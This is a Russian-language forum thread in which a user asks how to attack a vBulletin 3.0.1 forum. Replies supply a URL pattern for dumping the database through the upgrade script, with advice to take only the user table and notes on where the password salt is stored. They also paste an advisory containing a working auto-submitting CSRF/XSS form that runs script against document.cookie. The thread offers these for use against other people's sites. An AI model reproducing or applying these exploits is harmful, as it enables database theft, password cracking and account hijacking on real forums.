Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу. Спасиб
www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord Возможность сделать дамп базы. Относительно стабильно работает на 3.0.1. *либо www.forum.site.domen либо www.site.domen/forum/... Попробуй. Хеши - солёные. Соль - последния столбец таблицы. Если покатит - советую делать дамп таблицы user (мэйби vb_user) Будет проще, меньше размером, да и нах тебе остальное?
а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"
Программа: vBulletin 3.0.1 Опасность: Низкая Наличие эксплоита: Да Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей. Пример/Эксплоит: <form action="http://host/newreply.php" name="vbform" method="post" style='visibility:hidden'> <input name="WYSIWYG_HTML" value="<IMG src="javascript:alert(document.cookie)">"/> <input name="do" value="postreply"/> <input name="t" value="123456" /> <input name="p" value="123456" /> <input type="submit" class="button" name="preview"/> </form> <script> document.all.preview.click(); </script>